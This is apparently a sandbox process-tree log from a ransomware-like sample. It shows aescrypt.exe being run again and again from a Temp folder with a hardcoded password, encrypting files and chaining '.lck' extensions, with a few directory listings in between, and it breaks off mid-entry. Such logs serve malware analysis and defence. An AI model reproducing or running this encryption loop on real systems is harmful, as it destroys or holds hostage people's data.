C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3172

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5256

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5456

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:4628

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4084

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5104

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5344

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:4788

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5840

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5848

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3976

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1928

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2916

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5308

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5352

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5508

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:6120

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5284

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5344

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5724

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5440

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4240

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5252

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
